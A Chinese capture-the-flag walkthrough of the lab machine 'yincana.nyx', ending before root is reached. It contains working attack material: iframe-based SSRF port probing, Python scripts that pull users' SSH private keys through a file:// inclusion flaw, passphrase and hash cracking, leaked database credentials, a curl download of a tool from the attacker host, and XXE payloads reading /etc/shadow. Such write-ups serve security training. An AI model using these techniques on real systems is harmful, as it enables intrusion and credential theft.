信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e3:f6:57       VMware, Inc.
192.168.60.223  08:00:27:45:16:43       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e1:d8:58       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.050 seconds (124.88 hosts/sec). 4 responded
❯ export ip=192.168.60.223
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.223:22
Open 192.168.60.223:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-03 14:57 CST
Initiating ARP Ping Scan at 14:57
Scanning 192.168.60.223 [1 port]
Completed ARP Ping Scan at 14:57, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:57
Completed Parallel DNS resolution of 1 host. at 14:57, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:57
Scanning 192.168.60.223 [2 ports]
Discovered open port 22/tcp on 192.168.60.223
Discovered open port 80/tcp on 192.168.60.223
Completed SYN Stealth Scan at 14:57, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.223
Host is up, received arp-response (0.00033s latency).
Scanned at 2025-03-03 14:57:42 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:45:16:43 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

扫一下目录

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404 --exclude-length 23
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.223
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] Exclude Length:          23
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 10701]
/chat.html            (Status: 200) [Size: 10558]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

存在一个聊天室/chat.html

通过聊天记录发现存在一个域名yincana.nyx，编辑hosts添加域名

1 2	❯ sudo vim /etc/hosts 192.168.60.223 yincana.nyx

再次扫描目录

❯ gobuster dir -u "http://yincana.nyx" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://yincana.nyx
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 311] [--> http://yincana.nyx/images/]
/index.php            (Status: 200) [Size: 24418]
/image.php            (Status: 200) [Size: 0]
/icon                 (Status: 301) [Size: 309] [--> http://yincana.nyx/icon/]
/css                  (Status: 301) [Size: 308] [--> http://yincana.nyx/css/]
/js                   (Status: 301) [Size: 307] [--> http://yincana.nyx/js/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

`SSRF`

在contact页面中找到了交互按钮

猜测发送的url，管理员会对其进行访问

写一个最简单html网页

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
</head>
<body>
    <h1> This is test </h1>
</body>
</html>

验证一下，果然可以

1
2
3

❯ tail -f /var/log/nginx/access.log
192.168.60.223 - - [03/Mar/2025:15:04:27 +0800] "GET / HTTP/1.1" 200 548 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.0.0 Safari/537.36"
192.168.60.223 - - [03/Mar/2025:15:04:27 +0800] "GET /favicon.ico HTTP/1.1" 404 181 "http://192.168.60.100/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/125.0.0.0 Safari/537.36"

同时在扫目录中发现/image.php返回值为0

在源代码中查找相关代码

存在参数id

访问后可以得到每个id的图片，模糊测试一下

❯ wfuzz -c -z range,1-1000 -u "http://yincana.nyx/image.php?id=FUZZ" --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://yincana.nyx/image.php?id=FUZZ
Total requests: 1000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   200        1147 L   11177 W    301784 Ch   "1"
000000003:   200        1564 L   14932 W    403629 Ch   "3"
000000013:   200        266 L    1816 W     55656 Ch    "13"
000000002:   200        1043 L   9758 W     267317 Ch   "2"
000000008:   200        900 L    8186 W     238270 Ch   "8"
000000006:   200        2107 L   18777 W    520404 Ch   "6"
000000009:   200        3138 L   28309 W    741786 Ch   "9"

Total time: 0
Processed Requests: 1000
Filtered Requests: 993
Requests/sec.: 0

发现id=13显示的是之前我们提交的网页

那我们可以利用html语言中的iframe标签，在网页中内嵌另一个html文档

然后我们让GPT给我们最基础的html文件内容格式

稍微修改一下

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
</head>
<body>
    <iframe src="http://localhost/server-status" width="1100" height="1100"></iframe>
</body>
</html>

利用python开启一个简易的http服务

再次在contact提交我们的地址

❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.223 - - [03/Mar/2025 17:10:11] "GET /index.html HTTP/1.1" 200 -
192.168.60.223 - - [03/Mar/2025 17:10:11] code 404, message File not found
192.168.60.223 - - [03/Mar/2025 17:10:11] "GET /www.google.com HTTP/1.1" 404 -
192.168.60.223 - - [03/Mar/2025 17:10:11] code 404, message File not found
192.168.60.223 - - [03/Mar/2025 17:10:11] "GET /favicon.ico HTTP/1.1" 404

进行模糊测试一下，找到id号

❯ wfuzz -c -z range,1-1000 -u "http://yincana.nyx/image.php?id=FUZZ" --hw 0

 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://yincana.nyx/image.php?id=FUZZ
Total requests: 1000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000015:   200        129 L    390 W      5623 Ch     "15"
000000020:   200        501 L    617 W      8475 Ch     "20"
000000001:   200        1147 L   11177 W    301784 Ch   "1"
000000003:   200        1564 L   14932 W    403629 Ch   "3"
000000017:   200        69 L     561 W      19221 Ch    "17"
000000016:   200        69 L     561 W      19221 Ch    "16"
000000013:   200        266 L    1816 W     55656 Ch    "13"
000000006:   200        2107 L   18777 W    520404 Ch   "6"
000000008:   200        900 L    8186 W     238270 Ch   "8"
000000002:   200        1043 L   9758 W     267317 Ch   "2"
000000009:   200        3138 L   28309 W    741786 Ch   "9"
000000019:   200        129 L    390 W      5623 Ch     "19"
000000018:   200        483 L    616 W      9576 Ch     "18"
000000021:   200        744 L    6943 W     213998 Ch   "21"

Total time: 0
Processed Requests: 1000
Filtered Requests: 986
Requests/sec.: 0

在id=21中，浏览器访问一下

可以发现显示了服务器状态监控的一些信息

但是这个页面中没有什么有价值的信息

猜测在靶机本地内部开放了某些端口服务

利用python来遍历常见的端口，通过修改iframe的src属性来进行测试

`Iframe`利用

这里借用blackpist0l的代码

#!/usr/bin/python3

import os
import requests
from bs4 import BeautifulSoup
import re
import signal
from pwn import *

# 捕捉Ctrl+C信号
def signal_handler(sig, frame):
    print('[*] Saliendo...')
    os.system("rm index.html")
    sys.exit(0)

signal.signal(signal.SIGINT, signal_handler)

# 变量定义
url = 'http://yincana.nyx'
data = f"titulo=a&descripcion=a&url=http%3A%2F%2F192.168.60.100:8000%2F"
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
}
common_http_ports = open("/usr/share/wordlists/seclists/Discovery/Infrastructure/common-http-ports.txt", "r")

# HTML结构模板
html_content = """
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
</head>

<body>
    <p id="port">aaaa</p>
    <iframe src="http://localhost/" width="1100" height="1100"></iframe>
</body>

</html>
"""

# 如果index.html文件不存在，则创建
if not os.path.exists("index.html"):
    with open("index.html", "w") as file:
        file.write(html_content)

# 进度条
p1 = log.progress("Iframe src")

# 遍历常见的HTTP端口
with common_http_ports as ports:
    for port in ports:
        # 解析HTML
        with open("index.html", "r") as file:
            soup = BeautifulSoup(file, "html.parser")

            # 查找<iframe>标签
            iframe = soup.find("iframe")

            # 查找<p>标签
            text_port = soup.find("p", id="port")

            # 设置当前测试的端口号
            if text_port:
                text_port.string = "port tester: " + str(port)

            # 修改iframe的src属性
            iframe['src'] = "http://localhost:" + str(port)

            # 更新进度条
            p1.status(iframe['src'])

            # 保存修改后的HTML文件
            with open("index.html", "w") as file:
                file.write(str(soup))

            # 模拟用户发送POST请求
            response = requests.post(url, headers=headers, data=data)

# 删除index.html文件
os.system("rm index.html")

我们先开启http服务后再跑一下python脚本，自动的替我们去提交网页，并修改其中的iframe的src值

❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
-------------------------------------------------
❯ python3 exp.py
[↑] Iframe src: http://localhost:30821

再次模糊测试一下，查看id

发现id=87时返回的响应是比较短的

❯ wfuzz -c -z range,1-1000 -u "http://yincana.nyx/image.php?id=FUZZ" --hw 0

 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://yincana.nyx/image.php?id=FUZZ
Total requests: 1000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000015:   200        129 L    390 W      5623 Ch     "15"
000000001:   200        1147 L   11177 W    301784 Ch   "1"
000000003:   200        1564 L   14932 W    403629 Ch   "3"
000000019:   200        129 L    390 W      5623 Ch     "19"
000000013:   200        266 L    1816 W     55656 Ch    "13"
000000018:   200        483 L    616 W      9576 Ch     "18"
000000016:   200        69 L     561 W      19221 Ch    "16"
000000020:   200        501 L    617 W      8475 Ch     "20"
000000017:   200        69 L     561 W      19221 Ch    "17"
000000021:   200        744 L    6943 W     213998 Ch   "21"
000000065:   200        126 L    436 W      7354 Ch     "65"
000000008:   200        900 L    8186 W     238270 Ch   "8"
000000002:   200        1043 L   9758 W     267317 Ch   "2"
000000081:   200        128 L    455 W      7705 Ch     "81"
000000009:   200        3138 L   28309 W    741786 Ch   "9"
000000093:   200        17 L     570 W      7936 Ch     "93"
000000092:   200        128 L    443 W      7213 Ch     "92"
000000091:   200        127 L    450 W      7598 Ch     "91"
000000090:   200        126 L    441 W      7431 Ch     "90"
000000089:   200        125 L    452 W      7459 Ch     "89"
000000088:   200        130 L    448 W      7589 Ch     "88"
000000006:   200        2107 L   18777 W    520404 Ch   "6"
000000087:   200        7 L      599 W      9174 Ch     "87"
000000086:   200        125 L    451 W      7720 Ch     "86"
000000085:   200        127 L    450 W      7556 Ch     "85"
000000084:   200        128 L    458 W      7779 Ch     "84"
000000083:   200        131 L    454 W      7681 Ch     "83"
000000080:   200        126 L    432 W      7385 Ch     "80"
000000082:   200        127 L    463 W      7617 Ch     "82"
000000079:   200        127 L    445 W      7382 Ch     "79"
000000078:   200        129 L    440 W      7524 Ch     "78"
000000077:   200        132 L    444 W      7405 Ch     "77"
000000076:   200        126 L    433 W      7310 Ch     "76"
000000073:   200        124 L    457 W      7443 Ch     "73"
000000072:   200        127 L    451 W      7687 Ch     "72"
000000071:   200        126 L    445 W      7433 Ch     "71"
000000070:   200        129 L    446 W      7465 Ch     "70"
000000069:   200        128 L    442 W      7379 Ch     "69"
000000068:   200        129 L    432 W      7389 Ch     "68"
000000063:   200        125 L    434 W      7424 Ch     "63"
000000066:   200        126 L    434 W      7371 Ch     "66"
000000061:   200        126 L    433 W      7331 Ch     "61"
000000074:   200        126 L    455 W      7716 Ch     "74"
000000067:   200        128 L    445 W      7621 Ch     "67"
000000064:   200        128 L    434 W      7526 Ch     "64"
000000075:   200        129 L    454 W      7662 Ch     "75"
000000062:   200        122 L    420 W      7270 Ch     "62"
000000060:   200        128 L    439 W      7264 Ch     "60"
000000059:   200        933 L    7609 W     225776 Ch   "59"
000000058:   200        128 L    439 W      7240 Ch     "58"

Total time: 0.515040
Processed Requests: 1000
Filtered Requests: 950
Requests/sec.: 1941.594

`LFI`文件包含

浏览器访问一下，根据页面提示在本地端口7001中

访问需要添加url参数

猜测可能含有LFI漏洞

利用file://协议测试一下

我们手动修改一下iframe标签中的src

❯ vim index.html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
</head>
<body>
    <iframe src="http://localhost:7001?url=file:///etc/passwd" width="1100" height="1100"></iframe>
</body>
</html>

再次通过上面的步骤

得到需要再次添加参数id

修改src后src="http://localhost:7001?url=file:///etc/passwd&id=2333"

同时再次模糊测试，得到一个id=2333的网页

❯ wfuzz -c -z range,1-3000 -u "http://yincana.nyx/image.php?id=FUZZ" --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://yincana.nyx/image.php?id=FUZZ
Total requests: 3000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

……………………省略其他…………
000002333:   200        890 L    8064 W     243244 Ch   "2333"

Total time: 2.479623
Processed Requests: 3000
Filtered Requests: 2947
Requests/sec.: 1209.860

不过有很多用户名，正常思路是利用此LFI漏洞来读用户私钥的

没想到这么多用户名，利用GPT让他进行OCR识别

尽管还是出现一点错误，不过大多数都对了

将用户名写入文本中，再次利用上述python脚本，进行测试

#!/usr/bin/python3

import os
import requests
from bs4 import BeautifulSoup
import re
import signal
from pwn import *

# 捕捉Ctrl+C信号
def signal_handler(sig, frame):
    print('[*] 退出中...')
    os.system("rm index.html")
    sys.exit(0)

signal.signal(signal.SIGINT, signal_handler)

# 变量定义
url = 'http://yincana.nyx'  # 目标URL
data = f"titulo=a&descripcion=a&url=http%3A%2F%2F192.168.60.100:8000%2F"  # POST请求数据
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',  # 请求头，指定内容类型为application/x-www-form-urlencoded
}
number = 3000  # 初始ID

# HTML模板
html_content = """
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
</head>

<body>
    <iframe src="" width="1100" height="1100"></iframe>
</body>

</html>
"""

# 如果index.html文件不存在，则创建
if not os.path.exists("index.html"):
    with open("index.html", "w") as file:
        file.write(html_content)

# 进度条
p1 = log.progress("FUZZ")

# 从users.txt文件中读取用户列表
with open("users.txt", "r") as users_file:
    users = users_file.read().splitlines()

# 遍历用户列表
for i, user in enumerate(users):

    # 解析HTML文件
    with open("index.html", "r") as file:
        soup = BeautifulSoup(file, "html.parser")

    # 查找<iframe>标签
    iframe = soup.find("iframe")

    # 修改<iframe>的src属性，指向用户的SSH私钥文件
    iframe['src'] = f"http://localhost:7001?url=file:///home/{user}/.ssh/id_rsa&id={number}"

    # 更新进度条状态
    p1.status(iframe['src'])

    # 保存修改后的HTML文件
    with open("index.html", "w") as file:
        file.write(str(soup))

    # 发送POST请求
    response = requests.post(url, headers=headers, data=data)

    # 增加ID
    number += 1

# 删除index.html文件
os.system("rm index.html")

因为代码中设置了id从3000开始

所以模糊测试直接从第3000开始

❯ wfuzz -c -z range,3000-4000 -u "http://yincana.nyx/image.php?id=FUZZ" --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://yincana.nyx/image.php?id=FUZZ
Total requests: 1001

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000034:   200        1044 L   8066 W     252834 Ch   "3033"

Total time: 0
Processed Requests: 1001
Filtered Requests: 1000
Requests/sec.: 0

浏览器访问一下，拿到私钥图片

我尝试利用QQ自带的OCR能不能识别出来

能识别，不过也不是百分百准确，有些大写O是识别为0

卧槽，麻了，丢给gpt，加上自己人工修改一些错误，还是不对

我直接抄WP，拿过来一份私钥

爆破一下私钥文件

❯ chmod 600 id_rsa2
❯ ssh2john id_rsa2 >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
flowers          (id_rsa2)
1g 0:00:00:07 DONE (2025-03-03 19:39) 0.1328g/s 42.49p/s 42.49c/s 42.49C/s adidas..101010
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

查看私钥的备注信息，得知是用户 jazmin

❯ ssh-keygen -c -f id_rsa2
Enter passphrase:
Old comment: jazmin@yincana
New comment:

用户提权

ssh连接一下

❯ ssh  jazmin@$ip -i id_rsa2
The authenticity of host '192.168.60.223 (192.168.60.223)' can't be established.
ED25519 key fingerprint is SHA256:5slNBMqkq5SEkGz6odIz7NG2zCzgpEkWGZh2k2Hgsf4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.223' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa2':
Linux yincana 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun  3 17:43:07 2024 from 192.168.1.10
$ bash
jazmin@yincana:~$

我们可以发现每个用户都拥有sudo权限，不过我尝试了很多个感觉就是个循坏，最后可能还是跳到原来的用户中

jazmin@yincana:~$ sudo -l
Matching Defaults entries for jazmin on yincana:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User jazmin may run the following commands on yincana:
    (kalanoche) NOPASSWD: /bin/bash
jazmin@yincana:~$ sudo -u kalanoche /bin/bash
kalanoche@yincana:/home/jazmin$ sudo -l
Matching Defaults entries for kalanoche on yincana:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User kalanoche may run the following commands on yincana:
    (lavanda) NOPASSWD: /bin/bash

放弃这条路

密码泄露

查看本地开放端口时，发现存在3306端口

jazmin@yincana:~$ ss -luntp
Netid         State           Recv-Q          Send-Q                   Local Address:Port                   Peer Address:Port         Process
udp           UNCONN          0               0                              0.0.0.0:68                          0.0.0.0:*
tcp           LISTEN          0               128                            0.0.0.0:22                          0.0.0.0:*
tcp           LISTEN          0               80                           127.0.0.1:3306                        0.0.0.0:*
tcp           LISTEN          0               128                               [::]:22                             [::]:*
tcp           LISTEN          0               511                                  *:80                                *:*
tcp           LISTEN          0               511                              [::1]:7001                           [::]:*             users:(("node",pid=437,fd=18))

尝试读一下数据库的配置文件

在网站源代码中未直接标注用户名及密码

写在了环境变量中

jazmin@yincana:/var/www/yincana.nyx/public$ head index.php
<?php
// Conectarse a la base de datos usando variables de entorno
$dbhost = getenv('DB_HOST');
$dbuser = getenv('DB_USER');
$dbpass = getenv('DB_PASS');
$dbname = getenv('DB_NAME');

try {
   $pdo = new PDO("mysql:host=$dbhost;dbname=$dbname", $dbuser, $dbpass);
   $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

读一下apache2中设置的环境变量

jazmin@yincana:/var/www/yincana.nyx/public$ cat /etc/apache2/sites-available/yincana.nyx.conf
<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin [email protected]
        ServerName yincana.nyx
        ServerAlias www.yincana.nyx
        DocumentRoot /var/www/yincana.nyx/public

        SetEnv DB_HOST "localhost"
        SetEnv DB_USER "dbusryinc"
        SetEnv DB_PASS "vXbSrUg8bJy37d7BMtm2"
        SetEnv DB_NAME "dbyinc"

        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>

mysql连接查一下用户表

jazmin@yincana:/var/www/yincana.nyx/public$ mysql -udbusryinc -pvXbSrUg8bJy37d7BMtm2
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 284
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| dbyinc             |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0,011 sec)

MariaDB [(none)]> use dbyinc
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [dbyinc]> show tables ;
+------------------+
| Tables_in_dbyinc |
+------------------+
| pages            |
| users            |
+------------------+
2 rows in set (0,000 sec)

MariaDB [dbyinc]> select * from users;
+----+-----------+------------------------------------------------------------------+
| id | user      | password                                                         |
+----+-----------+------------------------------------------------------------------+
|  1 | rosa      | c1f5e137c6c1f916df74346b07babf75eae28aae6ed7feb97acb4d8ecc100be6 |
|  2 | jazmin    | aad1f18034ad4a5dae8bbe64455d207b0034388219e2a3d701e75e0424d1f8d1 |
|  3 | margarita | 810c4dc129e30e975c84e9b8f968fcc3e44316c41d196eb037c2100cd69691a8 |
|  4 | narciso   | c6a08c5263923938cabcd1880ab080d7b3b82c21ddc0435da870344b39a6624a |
+----+-----------+------------------------------------------------------------------+
4 rows in set (0,002 sec)

MariaDB [dbyinc]>

其他hash未找到结果，只有margarita用户的密码可以通过在线平台得出flores

任意文件写入

切换上去，可以用sudo执行xsltproc

jazmin@yincana:/var/www/yincana.nyx/public$ su margarita
Contraseña:
$ bash
margarita@yincana:/var/www/yincana.nyx/public$ sudo -l
Matching Defaults entries for margarita on yincana:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User margarita may run the following commands on yincana:
    (narciso) NOPASSWD: /bin/bash
    (manel) /usr/bin/xsltproc

xsltproc是一个命令行工具，用于处理XML文件并应用XSLT（可扩展样式表语言转换）样式表来转换XML文档。这个工具是libxslt库的一部分，libxslt是用于处理XSLT的C语言库。

我尝试利用GPT给的例子来转换一下

a.xml

<?xml version="1.0" encoding="UTF-8"?>
<greetings>
    <greeting>
        <message>Hello, World!</message>
    </greeting>
</greetings>

b.xsl

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
    <xsl:output method="html" encoding="UTF-8"/>
    <xsl:template match="/">
        <html>
            <head>
                <title>Greeting</title>
            </head>
            <body>
                <h1>Greeting</h1>
                <xsl:for-each select="greetings/greeting">
                    <p><xsl:value-of select="message"/></p>
                </xsl:for-each>
            </body>
        </html>
    </xsl:template>
</xsl:stylesheet>

XSLT（可扩展样式表语言转换，XSL Transformations）: 用于定义如何将XML文档转换为另一种格式（如HTML、纯文本或另一种XML格式）。XSLT通过编写一组规则（即模板）来匹配和处理XML文档中的不同元素。

Root提权

`Crontab`任务

传个pspy64上去监测一下进程信息

manel@yincana:/tmp$ curl 192.168.60.100/pspy64 -O /tmp/pspy64
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 3032k  100 3032k    0     0  42.2M      0 --:--:-- --:--:-- --:--:-- 42.2M
curl: (3) URL using bad/illegal format or missing URL
manel@yincana:/tmp$ chmod +x pspy64
manel@yincana:/tmp$ ./pspy64
2025/03/03 14:36:01 CMD: UID=0     PID=22256  | /usr/sbin/CRON -f
2025/03/03 14:36:01 CMD: UID=0     PID=22255  | /usr/sbin/CRON -f
2025/03/03 14:36:01 CMD: UID=0     PID=22257  | /bin/sh -c /bin/bash -c '/usr/bin/xsltproc --stringparam current-date "`date`" -o /var/www/html/chat.html /root/chat.xsl /home/mensajes.xml >> /tmp/test.log'
2025/03/03 14:36:01 CMD: UID=0     PID=22258  | /bin/bash -c /usr/bin/xsltproc --stringparam current-date "`date`" -o /var/www/html/chat.html /root/chat.xsl /home/mensajes.xml >> /tmp/test.log
2025/03/03 14:36:01 CMD: UID=0     PID=22259  | /bin/bash -c /usr/bin/xsltproc --stringparam current-date "`date`" -o /var/www/html/chat.html /root/chat.xsl /home/mensajes.xml >> /tmp/test.log

发现root用户定期使用xsltproc工具应用/root/chat.xsl样式表，将/home/mensajes.xml文件转换为HTM

并且输出到/var/www/html/chat.html

我看了一下mensajes.xml用户组 backupchat是可以修改的

而manel用户也是隶属于 backupchat用户组中

manel@yincana:/tmp$ ls -al /home/mensajes.xml
-rw-rw-r-- 1 root backupchat 5241 jun  2  2024 /home/mensajes.xml
manel@yincana:/tmp$ id
uid=1000(manel) gid=1000(manel) grupos=1000(manel),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),1051(backupchat)

所以修改mensajes.xml就达成我们的目的了

这里可以使用XXE漏洞，可以实现任意文件读取

按照原来的格式，编辑一下mensajes.xml

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/shadow"> ]>
<chat>
<message user="File" color="#ffff">
&xxe;
</message>
</chat>

访问一下chat.html

果然显示了/etc/shadow文件中的内容

同时你可以发现那个定时任务中的date命令没有使用绝对路径

但是正常而言哪个用户执行命令就是利用哪个用户的环境变量

所以这条命令，是由root的环境变量来执行的

1	2025/03/03 14:36:01 CMD: UID=0 PID=22259 \| /bin/bash -c /usr/bin/xsltproc --stringparam current-date "`date`" -o /var/www/html/chat.html /root/chat.xsl /home/mensajes.xml >> /tmp/test.log

我们通过XXE漏洞查看一下root的定时任务crontab

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "/var/spool/cron/crontabs/root" >]>
<chat>
<message user="File" color="#ffff">
&xxe;
</message>
</chat>

等待定时任务触发

